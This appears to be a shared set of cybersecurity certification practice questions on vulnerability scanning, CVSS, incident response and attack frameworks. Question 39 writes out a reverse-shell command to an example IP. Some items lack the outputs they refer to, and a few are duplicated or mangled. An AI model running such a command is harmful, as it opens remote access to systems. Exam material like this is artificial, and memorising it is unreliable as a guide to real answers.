Questions1-155.docx
Document Details
Uploaded by StateOfTheArtUnicorn
University of Arizona
Tags
Related
- Chapter 8 - 03 - Discuss Vulnerability Assessment - 03_ocred.pdf
- Network-Level Attacks: Certified Cybersecurity Technician Exam Prep PDF
- Chapter 8 - 03 - Discuss Vulnerability Assessment - 01_ocred_fax_ocred.pdf
- Chapter 8 - 03 - Discuss Vulnerability Assessment - 02_ocred_fax_ocred.pdf
- Question Set Combined.docx - Past Paper PDF
- Combined Question Set - Past Paper PDF
Full Transcript
**Question 1:**\ A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact on confidentiality and integrity but not on availability. Which of the following CVE metrics would be most accurate for this zero-day threa...
**Question 1:**\ A recent zero-day vulnerability is being actively exploited, requires no user interaction or privilege escalation, and has a significant impact on confidentiality and integrity but not on availability. Which of the following CVE metrics would be most accurate for this zero-day threat? A\) CVSS: 31/AV: N/AC: L/PR: N/UI: N/S: U/C: H/I: H/A: L\ B) CVSS: 31/AV: K/AC: L/PR: H/UI: R/S: C/C: H/I: H/A: L\ C) CVSS: 31/AV: N/AC: L/PR: N/UI: H/S: U/C: L/I: N/A: H\ D) CVSS: 31/AV: L/AC: L/PR: R/UI: R/S: U/C: H/I: L/A: H **Question 2:**\ Which of the following tools would work best to prevent the exposure of PII outside of an organization? A\) PAM\ B) IDS\ C) PKI\ D) DLP **Question 3:**\ An organization conducted a web application vulnerability assessment against the corporate website, and the following output was observed:\ Which of the following tuning recommendations should the security analyst share? A\) Set an HttpOnly flag to force communication by HTTPS\ B) Block requests without an X-Frame-Options header\ C) Configure an Access-Control-Allow-Origin header to authorized domains\ D) Disable the cross-origin resource sharing header **Question 4:**\ Which of the following items should be included in a vulnerability scan report? (Choose two.) A\) Lessons learned\ B) Service-level agreement\ C) Playbook\ D) Affected hosts\ E) Risk score\ F) Education plan **Question 5:**\ The Chief Executive Officer of an organization recently heard that exploitation of new attacks in the industry was happening approximately 45 days after a patch was released. Which of the following would best protect this organization? A\) A mean time to remediate of 30 days\ B) A mean time to detect of 45 days\ C) A mean time to respond of 15 days\ D) Third-party application testing **Question 6:**\ A security analyst recently joined the team and is trying to determine which scripting language is being used in a production script to determine if it is malicious. Given the following script, which of the following scripting languages was used? A\) PowerShell\ B) Ruby\ C) Python\ D) Shell script **Question 7:**\ A company\'s user accounts have been compromised. Users are also reporting that the company\'s internal portal is sometimes only accessible through HTTP, other times it is accessible through HTTPS. Which of the following most likely describes the observed activity? A\) There is an issue with the SSL certificate causing port 443 to become unavailable for HTTPS access\ B) An on-path attack is being performed by someone with internal access that forces users into port 80\ C) The web server cannot handle an increasing amount of HTTPS requests so it forwards users to port 80\ D) An error was caused by BGP due to new rules applied over the company\'s internal routers **Question 8:**\ Which of the following items should be included in a vulnerability scan report? (Choose two.) A\) Lessons learned\ B) Service-level agreement\ C) Playbook\ D) Affected hosts\ E) Risk score\ F) Education plan **Question 9:**\ Which of the following will most likely ensure that mission-critical services are available in the event of an incident? A\) Business continuity plan\ B) Vulnerability management plan\ C) Disaster recovery plan\ D) Asset management plan **Question 10:**\ The Chief Information Security Officer wants to eliminate and reduce shadow IT in the enterprise. Several high-risk cloud applications are used that increase the risk to the organization. Which of the following solutions will assist in reducing the risk? A\) Deploy a CASB and enable policy enforcement\ B) Configure MFA with strict access\ C) Deploy an API gateway\ D) Enable SSO to the cloud applications **Question 11:**\ An incident response team receives an alert to start an investigation of an internet outage. The outage is preventing all users in multiple locations from accessing external SaaS resources. The team determines the organization was impacted by a DDoS attack. Which of the following logs should the team review first? A\) CDN\ B) Vulnerability scanner\ C) DNS\ D) Web server **Question 12:**\ A malicious actor has gained access to an internal network by means of social engineering. The actor does not want to lose access in order to continue the attack. Which of the following best describes the current stage of the Cyber Kill Chain that the threat actor is currently operating in? A\) Weaponization\ B) Reconnaissance\ C) Delivery\ D) Exploitation **Question 13:**\ An analyst finds that an IP address outside of the company network is being used to run network and vulnerability scans across external-facing assets. Which of the following steps of an attack framework is the analyst witnessing? A\) Exploitation\ B) Reconnaissance\ C) Command and control\ D) Actions on objectives **Question 14:**\ An incident response analyst notices multiple emails traversing the network that target only the administrators of the company. The email contains a concealed URL that leads to an unknown website in another country. Which of the following best describes what is happening? (Choose two.) A\) Beaconing\ B) Domain Name System hijacking\ C) Social engineering attack\ D) On-path attack\ E) Obfuscated links\ F) Address Resolution Protocol poisoning **Question 15:**\ During security scanning, a security analyst regularly finds the same vulnerabilities in a critical application. Which of the following recommendations would best mitigate this problem if applied along the SDLC phase? A\) Conduct regular red team exercises over the application in production\ B) Ensure that all implemented coding libraries are regularly checked\ C) Use application security scanning as part of the pipeline for the CI/CD flow\ D) Implement proper input validation for any data entry form **Question 16:**\ An analyst is reviewing a vulnerability report and must make recommendations to the executive team. The analyst finds that most systems can be upgraded with a reboot resulting in a single downtime window. However, two of the critical systems cannot be upgraded due to a vendor appliance that the company does not have access to. Which of the following inhibitors to remediation do these systems and associated vulnerabilities best represent? A\) Proprietary systems\ B) Legacy systems\ C) Unsupported operating systems\ D) Lack of maintenance windows **Question 17:**\ The security team reviews a web server for XSS and runs the following Nmap scan: Which of the following most accurately describes the result of the scan? A\) An output of characters "\>" and "\"" as the parameters used in the attempt\ B) The vulnerable parameter ID and unfiltered characters returned\ C) The vulnerable parameter and unfiltered or encoded characters passed "\>" and "\"" as unsafe\ D) The vulnerable parameter and characters "\>" and "\"" with a reflected XSS attempt **Question 18:**\ Which of the following is the best action to take after the conclusion of a security incident to improve incident response in the future? A\) Develop a call tree to inform impacted users\ B) Schedule a review with all teams to discuss what occurred\ C) Create an executive summary to update company leadership\ D) Review regulatory compliance with public relations for official notification **Question 19:**\ A security analyst received a malicious binary file to analyze. Which of the following is the best technique to perform the analysis? A\) Code analysis\ B) Static analysis\ C) Reverse engineering\ D) Fuzzing **Question 20:**\ An incident response team found IoCs in a critical server. The team needs to isolate and collect technical evidence for further investigation. Which of the following pieces of data should be collected first in order to preserve sensitive information before isolating the server? A\) Hard disk\ B) Primary boot partition\ C) Malicious files\ D) Routing table\ E) Static IP address **Question 21:**\ Which of the following security operations tasks are ideal for automation? A\) Suspicious file analysis: Look for suspicious-looking graphics in a folder. Create subfolders in the original folder based on the category of graphics found. Move the suspicious graphics to the appropriate subfolder\ B) Firewall IoC block actions: Examine the firewall logs for IoCs from the most recently published zero-day exploit. Take mitigating actions in the firewall to block the behavior found in the logs. Follow up on any false positives that were caused by the block rules\ C) Security application user errors: Search the error logs for signs of users having trouble with the security application. Look up the user\'s phone number. Call the user to help with any questions about using the application\ D) Email header analysis: Check the email header for a phishing confidence metric greater than or equal to five. Add the domain of the sender to the block list. Move the email to quarantine **Question 22:**\ An organization has experienced a breach of customer transactions. Under the terms of PCI DSS, which of the following groups should the organization report the breach to? A\) PCI Security Standards Council\ B) Local law enforcement\ C) Federal law enforcement\ D) Card issuer **Question 23:**\ Which of the following is the best metric for an organization to focus on given recent investments in SIEM, SOAR, and a ticketing system? A\) Mean time to detect\ B) Number of exploits by tactic\ C) Alert volume\ D) Quantity of intrusion attempts **Question 24:**\ A company is implementing a vulnerability management program and moving from an on-premises environment to a hybrid IaaS cloud environment. Which of the following implications should be considered on the new hybrid environment? A\) The current scanners should be migrated to the cloud\ B) Cloud-specific misconfigurations may not be detected by the current scanners\ C) Existing vulnerability scanners cannot scan IaaS systems\ D) Vulnerability scans on cloud environments should be performed from the cloud **Question 25:**\ A security alert was triggered when an end user tried to access a website that is not allowed per organizational policy. Since the action is considered a terminable offense, the SOC analyst collects the authentication logs, web logs, and temporary files, reflecting the web searches from the user\'s workstation, to build the case for the investigation. Which of the following is the best way to ensure that the investigation complies with HR or privacy policies? A\) Create a timeline of events detailing the date stamps, user account hostname, and IP information associated with the activities\ B) Ensure that the case details do not reflect any user-identifiable information. Password protect the evidence and restrict access to personnel related to the investigation\ C) Create a code name for the investigation in the ticketing system so that all personnel with access will not be able to easily identify the case as an HR-related investigation\ D) Notify the SOC manager for awareness after confirmation that the activity was intentional **Question 26:**\ Which of the following is the first step that should be performed when establishing a disaster recovery plan? A\) Agree on the goals and objectives of the plan\ B) Determine the site to be used during a disaster\ C) Demonstrate adherence to a standard disaster recovery process\ D) Identify applications to be run during a disaster **Question 27:**\ A technician identifies a vulnerability on a server and applies a software patch. Which of the following should be the next step in the remediation process? A\) Testing\ B) Implementation\ C) Validation\ D) Rollback **Question 28:**\ The analyst reviews the following endpoint log entry: Which of the following has occurred? A\) Registry change\ B) Rename computer\ C) New account introduced\ D) Privilege escalation **Question 29:**\ A security program was able to achieve a 30% improvement in MTTR by integrating security controls into a SIEM. The analyst no longer had to jump between tools. Which of the following best describes what the security program did? A\) Data enrichment\ B) Security control plane\ C) Threat feed combination\ D) Single pane of glass **Question 30:**\ Due to reports of unauthorized activity that was occurring on the internal network, an analyst is performing a network discovery. The analyst runs an Nmap scan against a corporate network to evaluate which devices were operating in the environment. Given the following output, which of the following choices should the analyst look at first? A\) wh4dc-748gy.lan (192.168.86.152)\ B) lan (192.168.86.22)\ C) imaging.lan (192.168.86.150)\ D) xlaptop.lan (192.168.86.249)\ E) p4wnp1\_aloa.lan (192.168.86.56) **Question 31:**\ When starting an investigation, which of the following must be done first? A\) Notify law enforcement\ B) Secure the scene\ C) Seize all related evidence\ D) Interview the witnesses **Question 32:**\ Which of the following describes how a CSIRT lead determines who should be communicated with and when during a security incident? A\) The lead should review what is documented in the incident response policy or plan\ B) Management level members of the CSIRT should make that decision\ C) The lead has the authority to decide who to communicate with at any time\ D) Subject matter experts on the team should communicate with others within the specified area of expertise **Question 33:**\ A new cybersecurity analyst is tasked with creating an executive briefing on possible threats to the organization. Which of the following will produce the data needed for the briefing? A\) Firewall logs\ B) Indicators of compromise\ C) Risk assessment\ D) Access control lists **Question 34:**\ An analyst notices there is an internal device sending HTTPS traffic with additional characters in the header to a known-malicious IP in another country. Which of the following describes what the analyst has noticed? A\) Beaconing\ B) Cross-site scripting\ C) Buffer overflow\ D) PHP traversal **Question 35:**\ A security analyst is reviewing a packet capture in Wireshark that contains an FTP session from a potentially compromised machine. The analyst sets the following display filter: ftp. The analyst can see there are several RETR requests with 226 Transfer complete responses, but the packet list pane is not showing the packets containing the file transfer itself. Which of the following can the analyst perform to see the entire contents of the downloaded files? A\) Change the display filter to tcp.port==20\ B) Change the display filter to ftp-data and follow the TCP streams\ C) Change the display filter to tcp.port==21\ D) Navigate to the File menu and select FTP from the Export objects option **Question 36:**\ A SOC manager receives a phone call from an upset customer. The customer received a vulnerability report two hours ago, but the report did not have a follow-up remediation response from an analyst. Which of the following documents should the SOC manager review to ensure the team is meeting the appropriate contractual obligations for the customer? A\) SLA\ B) MOU\ C) NDA\ D) Limitation of liability **Question 37:**\ Which of the following phases of the Cyber Kill Chain involves the adversary attempting to establish communication with a successfully exploited target? A\) Command and control\ B) Actions on objectives\ C) Exploitation\ D) Delivery **Question 38:**\ A company that has a geographically diverse workforce and dynamic IPs wants to implement a vulnerability scanning method with reduced network traffic. Which of the following would best meet this requirement? A\) External\ B) Agent-based\ C) Non-credentialed\ D) Credentialed **Question 39:**\ A security analyst detects an exploit attempt containing the following command:\ sh -i \>& /dev/udp/10.1.1.1/4821 0\>&1\ Which of the following is being attempted? A\) RCE\ B) Reverse shell\ C) XSS\ D) SQL injection **Question 40:**\ An older CVE with a vulnerability score of 7.1 was elevated to a score of 9.8 due to a widely available exploit being used to deliver ransomware. Which of the following factors would an analyst most likely communicate as the reason for this escalation? A\) Scope\ B) Weaponization\ C) CVSS\ D) Asset value **Question 41:**\ An analyst is reviewing a vulnerability report for a server environment with the following entries:\ Which of the following systems should be prioritized for patching first? A\) 10.101.27.98\ B) 54.73.225.17\ C) 54.74.110.26\ D) 54.74.110.228 **Question 42:**\ A company is in the process of implementing a vulnerability management program, and there are concerns about granting the security team access to sensitive data. Which of the following scanning methods can be implemented to reduce the access to systems while providing the most accurate vulnerability scan results? A\) Credentialed network scanning\ B) Passive scanning\ C) Agent-based scanning\ D) Dynamic scanning **Question 43:**\ A security analyst is trying to identify anomalies on the network routing. Which of the following functions can the analyst use on a shell script to achieve the objective most accurately? A\) function x() { info=\$(geoiplookup \$1) && echo \"\$1 \| \$info\" }\ B) function x() { info=\$(ping -c 1 \$1 \| awk -F \"/\" 'END{print \$5}') && echo \"\$1 \| \$info\" }\ C) function x() { info=\$(dig \$(dig -x \$1 \| grep PTR \| tail -n 1 \| awk -F \".in-addr\" '{print \$1}\').origin.asn.cymru.com TXT +short) && echo \"\$1 \| \$info\" }\ D) function x() { info=\$(traceroute -m 40 \$1 \| awk 'END{print \$1}') && echo \"\$1 \| \$info\" } **Question 44:**\ There are several reports of sensitive information being disclosed via file sharing services. The company would like to improve its security posture against this threat. Which of the following security controls would best support the company in this scenario? A\) Implement step-up authentication for administrators\ B) Improve employee training and awareness\ C) Increase password complexity standards\ D) Deploy mobile device management **Question 45:**\ Which of the following is the best way to begin preparation for a report titled \"What We Learned\" regarding a recent incident involving a cybersecurity breach? A\) Determine the sophistication of the audience that the report is meant for\ B) Include references and sources of information on the first page\ C) Include a table of contents outlining the entire report\ D) Decide on the color scheme that will effectively communicate the metrics **Question 46:**\ A security analyst is performing an investigation involving multiple targeted Windows malware binaries. The analyst wants to gather intelligence without disclosing information to the attackers. Which of the following actions would allow the analyst to achieve the objective? A\) Upload the binary to an air-gapped sandbox for analysis\ B) Send the binaries to the antivirus vendor\ C) Execute the binaries on an environment with internet connectivity\ D) Query the file hashes using VirusTotal **Question 47:**\ Which of the following would help to minimize human engagement and aid in process improvement in security operations? A\) OSSTMM\ B) SIEM\ C) SOAR\ D) QVVASP **Question 48:**\ After conducting a cybersecurity risk assessment for a new software request, a Chief Information Security Officer (CISO) decided the risk score would be too high. The CISO refused the software request. Which of the following risk management principles did the CISO select? A\) Avoid\ B) Transfer\ C) Accept\ D) Mitigate **Question 49:**\ Which of the following is an important aspect that should be included in the lessons-learned step after an incident? A\) Identify any improvements or changes in the incident response plan or procedures\ B) Determine if an internal mistake was made and who did it so they do not repeat the error\ C) Present all legal evidence collected and turn it over to law enforcement\ D) Discuss the financial impact of the incident to determine if security controls are well spent **Question 50:**\ The security operations team is required to consolidate several threat intelligence feeds due to redundant tools and portals. Which of the following will best achieve the goal and maximize results? A\) Single pane of glass\ B) Single sign-on\ C) Data enrichment\ D) Deduplication **Question 51:**\ Which of the following would a security analyst most likely use to compare TTPs between different known adversaries of an organization? A\) MITRE ATT&CK\ B) Cyber Kill Chain\ C) OWASP\ D) STIX/TAXII **Question 52:**\ An analyst is remediating items associated with a recent incident. The analyst has isolated the vulnerability and is actively removing it from the system. Which of the following steps of the process does this describe? A\) Eradication\ B) Recovery\ C) Containment\ D) Preparation **Question 53:**\ Joe, a leading sales person at an organization, has announced on social media that he is leaving his current role to start a new company that will compete with his current employer. Joe is soliciting his current employer\'s customers. However, Joe has not resigned or discussed this with his current supervisor yet. Which of the following would be the best action for the incident response team to recommend? A\) Isolate Joe\'s PC from the network\ B) Reimage the PC based on standard operating procedures\ C) Initiate a remote wipe of Joe\'s PC using mobile device management\ D) Perform no action until HR or legal counsel advises on next steps **Question 54:**\ The Chief Information Security Officer is directing a new program to reduce attack surface risks and threats as part of a zero-trust approach. The IT security team is required to come up with priorities for the program. Which of the following is the best priority based on common attack frameworks? A\) Reduce the administrator and privileged access accounts\ B) Employ a network-based IDS\ C) Conduct thorough incident response\ D) Enable SSO to enterprise applications **Question 55:**\ During an extended holiday break, a company suffered a security incident. This information was properly relayed to appropriate personnel in a timely manner, and the server was up to date and configured with appropriate auditing and logging. The Chief Information Security Officer wants to find out precisely what happened. Which of the following actions should the analyst take first? A\) Clone the virtual server for forensic analysis\ B) Log in to the affected server and begin analysis of the logs\ C) Restore from the last known-good backup to confirm there was no loss of connectivity\ D) Shut down the affected server immediately **Question 56:**\ A systems administrator is reviewing after-hours traffic flows from data-center servers and sees regular outgoing HTTPS connections from one of the servers to a public IP address. The server should not be making outgoing connections after hours. Looking closer, the administrator sees this traffic pattern around the clock during work hours as well. Which of the following is the most likely explanation? A\) C2 beaconing activity\ B) Data exfiltration\ C) Anomalous activity on unexpected ports\ D) Network host IP address scanning\ E) A rogue network device **Question 57:**\ New employees in an organization have been consistently plugging in personal webcams despite the company policy prohibiting use of personal devices. The SOC manager discovers that new employees are not aware of the company policy. Which of the following will the SOC manager most likely recommend to help ensure new employees are accountable for following the company policy? A\) Human resources must email a copy of a user agreement to all new employees\ B) Supervisors must get verbal confirmation from new employees indicating they have read the user agreement\ C) All new employees must take a test about the company security policy during the onboarding process\ D) All new employees must sign a user agreement to acknowledge the company security policy **Question 58:**\ An analyst has been asked to validate the potential risk of a new ransomware campaign that the Chief Financial Officer read about in the newspaper. The company is a manufacturer of a very small spring used in the newest fighter jet and is a critical piece of the supply chain for this aircraft. Which of the following would be the best threat intelligence source to learn about this new campaign? A\) Information sharing organization\ B) Blogs/forums\ C) Cybersecurity incident response team\ D) Deep/dark web **Question 59:**\ An incident response team finished responding to a significant security incident. The management team has asked the lead analyst to provide an after-action report that includes lessons learned. Which of the following is the most likely reason to include lessons learned? A\) To satisfy regulatory requirements for incident reporting\ B) To hold other departments accountable\ C) To identify areas of improvement in the incident response process\ D) To highlight the notable practices of the organization\'s incident response team **Question 60:**\ A vulnerability management team is unable to patch all vulnerabilities found during their weekly scans. Using the third-party scoring system described below, the team patches the most urgent vulnerabilities:\ Additionally, the vulnerability management team feels that the metrics Smear and Channing are less important than the others, so these will be lower in priority. Which of the following vulnerabilities should be patched first, given the above third-party scoring system? A\) InLoud: Cobain: Yes, Grohl: No, Novo: Yes, Smear: Yes, Channing: No\ B) TSpirit: Cobain: Yes, Grohl: Yes, Novo: Yes, Smear: No, Channing: No\ C) ENameless: Cobain: Yes, Grohl: No, Novo: Yes, Smear: No, Channing: No\ D) PBleach: Cobain: Yes, Grohl: No, Novo: No, Smear: No, Channing: Yes **Question 61:**\ A user downloads software that contains malware onto a computer that eventually infects numerous other systems. Which of the following has the user become? A\) Hacktivist\ B) Advanced persistent threat\ C) Insider threat\ D) Script kiddie **Question 62:**\ An organization has activated the CSIRT. A security analyst believes a single virtual server was compromised and immediately isolated from the network. Which of the following should the CSIRT conduct next? A\) Take a snapshot of the compromised server and verify its integrity\ B) Restore the affected server to remove any malware\ C) Contact the appropriate government agency to investigate\ D) Research the malware strain to perform attribution **Question 63:**\ During an incident, an analyst needs to acquire evidence for later investigation. Which of the following must be collected first in a computer system, related to its volatility level? A\) Disk contents\ B) Backup data\ C) Temporary files\ D) Running processes **Question 64:**\ A security analyst is trying to identify possible network addresses from different source networks belonging to the same company and region. Which of the following shell script functions could help achieve the goal? A\) function w() { a=\$(ping -c 1 \$1 \| awk-F "/" 'END{print \$1}') && echo "\$1 \| \$a" }\ B) function x() { b=\$(traceroute -m 40 \$1 \| awk 'END{print \$1}') && echo "\$1 \| \$b" }\ C) function y() { dig \$(dig -x \$1 \| grep PTR \| tail -n 1 \| awk -F ".in-addr" '{print \$1}').origin.asn.cymru.com TXT +short }\ D) function z() { c=\$(geoiplookup\$1) && echo "\$1 \| \$c" } **Question 65:**\ A security analyst is writing a shell script to identify IP addresses from the same country. Which of the following functions would help the analyst achieve the objective? A\) function w() { info=\$(ping -c 1 \$1 \| awk -F "/" 'END{print \$1}') && echo "\$1 \| \$info" }\ B) function x() { info=\$(geoiplookup \$1) && echo "\$1 \| \$info" }\ C) function y() { info=\$(dig -x \$1 \| grep PTR \| tail -n 1 ) && echo "\$1 \| \$info" }\ D) function z() { info=\$(traceroute -m 40 \$1 \| awk 'END{print \$1}') && echo "\$1 \| \$info" } **Question 66:**\ A security analyst obtained the following table of results from a recent vulnerability assessment that was conducted against a single web server in the environment:\ Which of the following should be completed first to remediate the findings? A\) Ask the web development team to update the page contents\ B) Add the IP address allow listing for control panel access\ C) Purchase an appropriate certificate from a trusted root CA\ D) Perform proper sanitization on all fields **Question 67:**\ A SOC analyst identifies the following content while examining the output of a debugger command over a client-server application:\ getconnection (database01, \"alpha \", \"AXTV. 127GdCx94GTd\") ;\ Which of the following is the most likely vulnerability in this system? A\) Lack of input validation\ B) SQL injection\ C) Hard-coded credential\ D) Buffer overflow attacks Question: 68 A company receives a penetration test report summary from a third party. The report summary indicates a proxy has some patches that need to be applied. The proxy is sitting in a rack and is not being used, as the company has replaced it with a new one. The CVE score of the vulnerability on the proxy is a 9.8. Which of the following best practices should the company follow with this proxy? A. Leave the proxy as is. B. Decomission the proxy. C. Migrate the proxy to the cloud. D. Patch the proxy Question 69 A zero-day command injection vulnerability was published. A security administrator is analyzing the following logs for evidence of adversaries attempting to exploit the vulnerability: Which of the following log entries provides evidence of the attempted exploit? A. Log entry 1 B. Log entry 2 C. Log entry 3 D. Log entry 4 Question: 70 Which of the following is the most important factor to ensure accurate incident response reporting? A. A well-defined timeline of the events B. A guideline for regulatory reporting C. Logs from the impacted system D. A well-developed executive summary Question: 71 A cybersecurity analyst notices unusual network scanning activity coming from a country that the company does not do business with. Which of the following is the best mitigation technique? A. Geoblock the offending source country B. Block the IP range of the scans at the network firewall. C. Perform a historical trend analysis and look for similar scanning activity. D. Block the specific IP address of the scans at the network firewall Question: 72 An employee is suspected of misusing a company-issued laptop. The employee has been suspended pending an investigation by human resources. Which of the following is the best step to preserve evidence? A. Disable the user\'s network account and access to web resources B. Make a copy of the files as a backup on the server. C. Place a legal hold on the device and the user\'s network share. D. Make a forensic image of the device and create a SRA-I hash. Question: 73 Patches for two highly exploited vulnerabilities were released on the same Friday afternoon. Information about the systems and vulnerabilities is shown in the tables below: Which of the following should the security analyst prioritize for remediation? A. rogers B. brady C. brees D. manning Question: 74 A security analyst is validating a particular finding that was reported in a web application vulnerability scan to make sure it is not a false positive. The security analyst uses the snippet below: Which of the following vulnerability types is the security analyst validating? A. Directory traversal B. XSS C. XXE D. SSRF Question: 75 During a cybersecurity incident, one of the web servers at the perimeter network was affected by ransomware. Which of the following actions should be performed immediately? A. Shut down the server. B. Reimage the server C. Quarantine the server D. Update the OS to latest version. Question: 76 A security analyst is performing vulnerability scans on the network. The analyst installs a scanner appliance, configures the subnets to scan, and begins the scan of the network. Which of the following would be missing from a scan performed with this configuration? A. Operating system version B. Registry key values C. Open ports D. IP address Question: 77 A security administrator has been notified by the IT operations department that some vulnerability reports contain an incomplete list of findings. Which of the following methods should be used to resolve this issue? A. Credentialed scan B. External scan C. Differential scan D. Network scan Question: 78 A cybersecurity analyst is reviewing SIEM logs and observes consistent requests originating from an internal host to a blocklisted external server. Which of the following best describes the activity that is taking place? A. Data exfiltration B. Rogue device C. Scanning D. Beaconing Question: 79 A technician is analyzing output from a popular network mapping tool for a PCI audit: Which of the following best describes the output? A. The host is not up or responding. B. The host is running excessive cipher suites. C. The host is allowing insecure cipher suites. D. The Secure Shell port on this host is closed